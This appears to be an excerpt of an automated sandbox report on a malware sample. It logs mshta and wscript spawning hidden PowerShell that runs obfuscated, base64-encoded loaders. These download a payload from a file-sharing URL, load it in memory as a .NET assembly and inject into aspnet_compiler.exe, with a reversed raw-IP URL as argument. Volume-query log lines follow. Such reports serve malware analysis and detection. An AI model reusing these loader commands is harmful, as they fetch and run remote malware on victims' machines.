dWJzdHJpbmcocHdnc3RhcnRJbmRleCwgcHdnYmFzZTY0TGVuZ3RoKTtwd2diYXNlNjRSZXZlcnNlZCA9IC1qb2luIChwd2diYXNlNjRDb21tYW5kLlRvJysnQ2hhckFycmF5KCkgNG91IEZvckVhY2gtT2JqZWN0IHsgcHdnXyB9KVstMS4uLShwd2diYXNlNjRDb21tYW5kLkxlbmd0aCldO3B3Z2NvbScrJ21hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcocHdnYmFzZTY0UmV2ZXJzZWQpO3B3Z2xvYWRlZEFzc2VtYmwnKyd5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChwd2djb21tYW5kQnl0ZXMpO3B3Z3ZhaU1ldGhvZCA9IFtkbicrJ2xpYi5JTy5Ib21lXS5HJysnZXRNZXRob2Qob1RBVkFJb1RBKTtwd2d2YWknKydNZXRob2QuSW52b2tlKHB3JysnZ251bGwsIEAob1RBdHh0LlNMTFBNUy8yMy82MzEuMzQyLjMuMjkxLy86cHR0aG9UQSwgb1RBZGVzYXRpdmFkb29UQSwnKycgb1RBZGVzJysnYXRpdmFkb29UQSwgb1RBZGVzYXQnKydpdmFkb29UQSwgb1RBYXNwbmV0X2NvbXBpbGVyb1RBLCBvVEFkJysnZXNhdGl2YWRvb1RBLCBvVEFkZXNhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpdmFkJysnb29UQSxvVEFkZScrJ3NhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpJysndmFkb29UQSxvVCcrJ0Exb1RBLG9UJysnQWRlc2F0aXZhZG9vVEEpKTsnKS5SZXBMQWNlKCdwd2cnLFtTVHJJbmddW0NoQXJdMzYpLlJlcExBY2UoKFtDaEFyXTExMStbQ2hBcl04NCtbQ2hBcl02NSksW1NUckluZ11bQ2hBcl0zOSkuUmVwTEFjZSgoW0NoQXJdNTIrW0NoQXJdMTExK1tDaEFyXTExNyksJ3wnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $vErBOSePREfERenCe.TOstring()[1,3]+'x'-JoIn'') (('pwgimageUrl'+' '+'= oTAhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnT'+'ICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb'+'209c62c1730945176a0904f oTA;'+'pwgwebClient = New-Object System.Net.WebClient;pwgimageBytes = pwgwebClient.Downl'+'oadData(pwgimageUrl);pwgimageText = [System.T'+'ext.Encoding]::UTF8.GetString(pwgimageBytes);pwgstartFlag = oTA<<BASE64_'+'START>>oTA;pwgendFlag = oTA<<BASE64_END>>oTA;pwgstartIndex = pwgimageText.IndexOf(pwgstartFlag);pwgendIndex = pwgimageText.Index'+'Of(pwgendFlag);pwg'+'startIndex -ge 0 -and pwgendIndex -gt pwgstartIndex;pwgstartIndex += pwgstartFlag.Length;pwgbase64Length = pwgendIndex - pwgstartIndex;pwgbase64Command'+' = pwgimageText.Substring(pwgstartIndex, pwgbase64Length);pwgbase64Reversed = -join (pwgbase64Command.To'+'CharArray() 4ou ForEach-Object { pwg_ })[-1..-(pwgbase64Command.Length)];pwgcom'+'mandBytes = [System.Convert]::FromBase64String(pwgbase64Reversed);pwgloadedAssembl'+'y = [System.Reflection.Assembly]::Load(pwgcommandBytes);pwgvaiMethod = [dn'+'lib.IO.Home].G'+'etMethod(oTAVAIoTA);pwgvai'+'Method.Invoke(pw'+'gnull, @(oTAtxt.SLLPMS/23/631.342.3.291//:ptthoTA, oTAdesativadooTA,'+' oTAdes'+'ativadooTA, oTAdesat'+'ivadooTA, oTAaspnet_compileroTA, oTAd'+'esativadooTA, oTAdesativadooTA,oTAdesativadooTA,oTAdesativad'+'ooTA,oTAde'+'sativadooTA,oTAdesativadooTA,oTAdesati'+'vadooTA,oT'+'A1oTA,oT'+'AdesativadooTA));').RepLAce('pwg',[STrIng][ChAr]36).RepLAce(([ChAr]111+[ChAr]84+[ChAr]65),[STrIng][ChAr]39).RepLAce(([ChAr]52+[ChAr]111+[ChAr]117),'\|'))"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]0x22+'jhc4mm1rrcagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicbhreqtvhlwrsagicagicagicagicagicagicagicagicagicagicagic1tzw1irvjkruzjtmluaw9oicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvytg1pti5kbgwilcagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbjdcxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbhz2j5dvjqre9ulhn0cmluzyagicagicagicagicagicagicagicagicagicagicagihn6s3pylhvpbnqgicagicagicagicagicagicagicagicagicagicagicbwvvissw50uhryicagicagicagicagicagicagicagicagicagicagicaguhpyktsnicagicagicagicagicagicagicagicagicagicagicaglw5hbuugicagicagicagicagicagicagicagicagicagicagicaidudvv29miiagicagicagicagicagicagicagicagicagicagicagic1oqu1lc3bby2ugicagicagicagicagicagicagicagicagicagicagicb5uw9oc3zvwvfmicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicr3odjtuuq6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumy4yndmumtm2lzmyl3nlzw15ymvzdhroaw5nc3dpdghlbnrpcmvsawzldgltzxroaw5nc3rvzg9tewjlc3qudelgiiwijgvodjpbufbeqvrbxhnlzw15ymvzdhroaw5nc3dpdghlbnrpcmvsawzldgltzxroaw5nc3rvzg9tewiudmjtiiwwldapo1nuyxjulxnmzuvqkdmpo2llecagicagicagicagicagicagicagicagicagicagicagicikru5wokfquerbvefcc2vlbxlizxn0dghpbmdzd2l0agvudglyzwxpzmv0aw1ldghpbmdzdg9kb215yi52ylmi'+[char]34+'))')))"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liggjhzfckjpu2vqukvmrvjlbknlllrpc3ryaw5nkclbmswzxssnecctsm9jbicnksaokcdwd2dpbwfnzvvybccrjyankyc9ig9uqwh0dhbzoi8vmtaxny5mawxlbwfpbc5jb20vyxbpl2zpbguvz2v0p2zpbgvrzxk9mkfhx2jxbzlszxu0nxq3qluxa1znc2q5cfq5cgdtu2x2u3rhcm5ujysnsunmrmhtvetqm0xdnlnrdeljt2nfvdm1dyzwa192awq9zmq0zjyxngjijysnmja5yzyyyze3mza5nduxnzzhmdkwngygb1rboycrj3b3z3dlyknsawvudca9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7chdnaw1hz2vcexrlcya9ihb3z3dlyknsawvudc5eb3dubccrj29hzerhdgeochdnaw1hz2vvcmwpo3b3z2ltywdlvgv4dca9ifttexn0zw0uvccrj2v4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkhb3z2ltywdlqnl0zxmpo3b3z3n0yxj0rmxhzya9ig9uqtw8qkftrty0xycrj1nuqvjupj5vvee7chdnzw5krmxhzya9ig9uqtw8qkftrty0x0vord4+b1rbo3b3z3n0yxj0sw5kzxggpsbwd2dpbwfnzvrlehqusw5kzxhpzihwd2dzdgfydezsywcpo3b3z2vuzeluzgv4id0gchdnaw1hz2vuzxh0lkluzgv4jysnt2yochdnzw5krmxhzyk7chdnjysnc3rhcnrjbmrlecatz2ugmcatyw5kihb3z2vuzeluzgv4ic1ndcbwd2dzdgfydeluzgv4o3b3z3n0yxj0sw5kzxggkz0gchdnc3rhcnrgbgfnlkxlbmd0adtwd2diyxnlnjrmzw5ndgggpsbwd2dlbmrjbmrlecatihb3z3n0yxj0sw5kzxg7chdnymfzzty0q29tbwfuzccrjya9ihb3z2ltywdlvgv4dc5tdwjzdhjpbmcochdnc3rhcnrjbmrlecwgchdnymfzzty0tgvuz3rokttwd2diyxnlnjrszxzlcnnlzca9ic1qb2luichwd2diyxnlnjrdb21tyw5kllrvjysnq2hhckfycmf5kckgng91iezvckvhy2gtt2jqzwn0ihsgchdnxyb9kvstms4ulshwd2diyxnlnjrdb21tyw5klkxlbmd0acldo3b3z2nvbscrj21hbmrcexrlcya9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcochdnymfzzty0umv2zxjzzwqpo3b3z2xvywrlzefzc2vtymwnkyd5id0gw1n5c3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6tg9hzchwd2djb21tyw5kqnl0zxmpo3b3z3zhau1ldghvzca9iftkbicrj2xpyi5jty5ib21lxs5hjysnzxrnzxrob2qob1rbvkfjb1rbkttwd2d2ywknkydnzxrob2qusw52b2tlkhb3jysnz251bgwsieaob1rbdhh0llnmtfbnuy8ymy82mzeumzqyljmumjkxly86chr0ag9uqswgb1rbzgvzyxrpdmfkb29uqswnkycgb1rbzgvzjysnyxrpdmfkb29uqswgb1rbzgvzyxqnkydpdmfkb29uqswgb1rbyxnwbmv0x2nvbxbpbgvyb1rblcbvvefkjysnzxnhdgl2ywrvb1rblcbvvefkzxnhdgl2ywrvb1rblg9uqwrlc2f0axzhzg9vveesb1rbzgvzyxrpdmfkjysnb29uqsxvvefkzscrj3nhdgl2ywrvb1rblg9uqwrlc2f0axzhzg9vveesb1rbzgvzyxrpjysndmfkb29uqsxvvccrj0exb1rblg9ujysnqwrlc2f0axzhzg9vveepktsnks5szxbmqwnlkcdwd2cnlfttvhjjbmddw0noqxjdmzyplljlcexby2uokftdaefyxtexmstbq2hbcl04nctbq2hbcl02nsksw1nuckluz11bq2hbcl0zoskuumvwtefjzsgow0noqxjdntirw0noqxjdmtexk1tdaefyxtexnyksj3wnksk=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".( $verbosepreference.tostring()[1,3]+'x'-join'') (('pwgimageurl'+' '+'= otahttps://1017.filemail.com/api/file/get?filekey=2aa_bwo9reu45t7bu1kvgsd9pt9pgsslvstgrnt'+'icffhmtkj3lc6sqticoc_t35w&pk_vid=fd4f614bb'+'209c62c1730945176a0904f ota;'+'pwgwebclient = new-object system.net.webclient;pwgimagebytes = pwgwebclient.downl'+'oaddata(pwgimageurl);pwgimagetext = [system.t'+'ext.encoding]::utf8.getstring(pwgimagebytes);pwgstartflag = ota<<base64_'+'start>>ota;pwgendflag = ota<<base64_end>>ota;pwgstartindex = pwgimagetext.indexof(pwgstartflag);pwgendindex = pwgimagetext.index'+'of(pwgendflag);pwg'+'startindex -ge 0 -and pwgendindex -gt pwgstartindex;pwgstartindex += pwgstartflag.length;pwgbase64length = pwgendindex - pwgstartindex;pwgbase64command'+' = pwgimagetext.substring(pwgstartindex, pwgbase64length);pwgbase64reversed = -join (pwgbase64command.to'+'chararray() 4ou foreach-object { pwg_ })[-1..-(pwgbase64command.length)];pwgcom'+'mandbytes = [system.convert]::frombase64string(pwgbase64reversed);pwgloadedassembl'+'y = [system.reflection.assembly]::load(pwgcommandbytes);pwgvaimethod = [dn'+'lib.io.home].g'+'etmethod(otavaiota);pwgvai'+'method.invoke(pw'+'gnull, @(otatxt.sllpms/23/631.342.3.291//:ptthota, otadesativadoota,'+' otades'+'ativadoota, otadesat'+'ivadoota, otaaspnet_compilerota, otad'+'esativadoota, otadesativadoota,otadesativadoota,otadesativad'+'oota,otade'+'sativadoota,otadesativadoota,otadesati'+'vadoota,ot'+'a1ota,ot'+'adesativadoota));').replace('pwg',[string][char]36).replace(([char]111+[char]84+[char]65),[string][char]39).replace(([char]52+[char]111+[char]117),'\|'))"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]0x22+'jhc4mm1rrcagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicbhreqtvhlwrsagicagicagicagicagicagicagicagicagicagicagic1tzw1irvjkruzjtmluaw9oicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvytg1pti5kbgwilcagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbjdcxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbhz2j5dvjqre9ulhn0cmluzyagicagicagicagicagicagicagicagicagicagicagihn6s3pylhvpbnqgicagicagicagicagicagicagicagicagicagicagicbwvvissw50uhryicagicagicagicagicagicagicagicagicagicagicaguhpyktsnicagicagicagicagicagicagicagicagicagicagicaglw5hbuugicagicagicagicagicagicagicagicagicagicagicaidudvv29miiagicagicagicagicagicagicagicagicagicagicagic1oqu1lc3bby2ugicagicagicagicagicagicagicagicagicagicagicb5uw9oc3zvwvfmicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicr3odjtuuq6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumy4yndmumtm2lzmyl3nlzw15ymvzdhroaw5nc3dpdghlbnrpcmvsawzldgltzxroaw5nc3rvzg9tewjlc3qudelgiiwijgvodjpbufbeqvrbxhnlzw15ymvzdhroaw5nc3dpdghlbnrpcmvsawzldgltzxroaw5nc3rvzg9tewiudmjtiiwwldapo1nuyxjulxnmzuvqkdmpo2llecagicagicagicagicagicagicagicagicagicagicagicikru5wokfquerbvefcc2vlbxlizxn0dghpbmdzd2l0agvudglyzwxpzmv0aw1ldghpbmdzdg9kb215yi52ylmi'+[char]34+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liggjhzfckjpu2vqukvmrvjlbknlllrpc3ryaw5nkclbmswzxssnecctsm9jbicnksaokcdwd2dpbwfnzvvybccrjyankyc9ig9uqwh0dhbzoi8vmtaxny5mawxlbwfpbc5jb20vyxbpl2zpbguvz2v0p2zpbgvrzxk9mkfhx2jxbzlszxu0nxq3qluxa1znc2q5cfq5cgdtu2x2u3rhcm5ujysnsunmrmhtvetqm0xdnlnrdeljt2nfvdm1dyzwa192awq9zmq0zjyxngjijysnmja5yzyyyze3mza5nduxnzzhmdkwngygb1rboycrj3b3z3dlyknsawvudca9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7chdnaw1hz2vcexrlcya9ihb3z3dlyknsawvudc5eb3dubccrj29hzerhdgeochdnaw1hz2vvcmwpo3b3z2ltywdlvgv4dca9ifttexn0zw0uvccrj2v4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkhb3z2ltywdlqnl0zxmpo3b3z3n0yxj0rmxhzya9ig9uqtw8qkftrty0xycrj1nuqvjupj5vvee7chdnzw5krmxhzya9ig9uqtw8qkftrty0x0vord4+b1rbo3b3z3n0yxj0sw5kzxggpsbwd2dpbwfnzvrlehqusw5kzxhpzihwd2dzdgfydezsywcpo3b3z2vuzeluzgv4id0gchdnaw1hz2vuzxh0lkluzgv4jysnt2yochdnzw5krmxhzyk7chdnjysnc3rhcnrjbmrlecatz2ugmcatyw5kihb3z2vuzeluzgv4ic1ndcbwd2dzdgfydeluzgv4o3b3z3n0yxj0sw5kzxggkz0gchdnc3rhcnrgbgfnlkxlbmd0adtwd2diyxnlnjrmzw5ndgggpsbwd2dlbmrjbmrlecatihb3z3n0yxj0sw5kzxg7chdnymfzzty0q29tbwfuzccrjya9ihb3z2ltywdlvgv4dc5tdwjzdhjpbmcochdnc3rhcnrjbmrlecwgchdnymfzzty0tgvuz3rokttwd2diyxnlnjrszxzlcnnlzca9ic1qb2luichwd2diyxnlnjrdb21tyw5kllrvjysnq2hhckfycmf5kckgng91iezvckvhy2gtt2jqzwn0ihsgchdnxyb9kvstms4ulshwd2diyxnlnjrdb21tyw5klkxlbmd0acldo3b3z2nvbscrj21hbmrcexrlcya9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcochdnymfzzty0umv2zxjzzwqpo3b3z2xvywrlzefzc2vtymwnkyd5id0gw1n5c3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6tg9hzchwd2djb21tyw5kqnl0zxmpo3b3z3zhau1ldghvzca9iftkbicrj2xpyi5jty5ib21lxs5hjysnzxrnzxrob2qob1rbvkfjb1rbkttwd2d2ywknkydnzxrob2qusw52b2tlkhb3jysnz251bgwsieaob1rbdhh0llnmtfbnuy8ymy82mzeumzqyljmumjkxly86chr0ag9uqswgb1rbzgvzyxrpdmfkb29uqswnkycgb1rbzgvzjysnyxrpdmfkb29uqswgb1rbzgvzyxqnkydpdmfkb29uqswgb1rbyxnwbmv0x2nvbxbpbgvyb1rblcbvvefkjysnzxnhdgl2ywrvb1rblcbvvefkzxnhdgl2ywrvb1rblg9uqwrlc2f0axzhzg9vveesb1rbzgvzyxrpdmfkjysnb29uqsxvvefkzscrj3nhdgl2ywrvb1rblg9uqwrlc2f0axzhzg9vveesb1rbzgvzyxrpjysndmfkb29uqsxvvccrj0exb1rblg9ujysnqwrlc2f0axzhzg9vveepktsnks5szxbmqwnlkcdwd2cnlfttvhjjbmddw0noqxjdmzyplljlcexby2uokftdaefyxtexmstbq2hbcl04nctbq2hbcl02nsksw1nuckluz11bq2hbcl0zoskuumvwtefjzsgow0noqxjdntirw0noqxjdmtexk1tdaefyxtexnyksj3wnksk=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".( $verbosepreference.tostring()[1,3]+'x'-join'') (('pwgimageurl'+' '+'= otahttps://1017.filemail.com/api/file/get?filekey=2aa_bwo9reu45t7bu1kvgsd9pt9pgsslvstgrnt'+'icffhmtkj3lc6sqticoc_t35w&pk_vid=fd4f614bb'+'209c62c1730945176a0904f ota;'+'pwgwebclient = new-object system.net.webclient;pwgimagebytes = pwgwebclient.downl'+'oaddata(pwgimageurl);pwgimagetext = [system.t'+'ext.encoding]::utf8.getstring(pwgimagebytes);pwgstartflag = ota<<base64_'+'start>>ota;pwgendflag = ota<<base64_end>>ota;pwgstartindex = pwgimagetext.indexof(pwgstartflag);pwgendindex = pwgimagetext.index'+'of(pwgendflag);pwg'+'startindex -ge 0 -and pwgendindex -gt pwgstartindex;pwgstartindex += pwgstartflag.length;pwgbase64length = pwgendindex - pwgstartindex;pwgbase64command'+' = pwgimagetext.substring(pwgstartindex, pwgbase64length);pwgbase64reversed = -join (pwgbase64command.to'+'chararray() 4ou foreach-object { pwg_ })[-1..-(pwgbase64command.length)];pwgcom'+'mandbytes = [system.convert]::frombase64string(pwgbase64reversed);pwgloadedassembl'+'y = [system.reflection.assembly]::load(pwgcommandbytes);pwgvaimethod = [dn'+'lib.io.home].g'+'etmethod(otavaiota);pwgvai'+'method.invoke(pw'+'gnull, @(otatxt.sllpms/23/631.342.3.291//:ptthota, otadesativadoota,'+' otades'+'ativadoota, otadesat'+'ivadoota, otaaspnet_compilerota, otad'+'esativadoota, otadesativadoota,otadesativadoota,otadesativad'+'oota,otade'+'sativadoota,otadesativadoota,otadesati'+'vadoota,ot'+'a1ota,ot'+'adesativadoota));').replace('pwg',[string][char]36).replace(([char]111+[char]84+[char]65),[string][char]39).replace(([char]52+[char]111+[char]117),'\|'))"	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
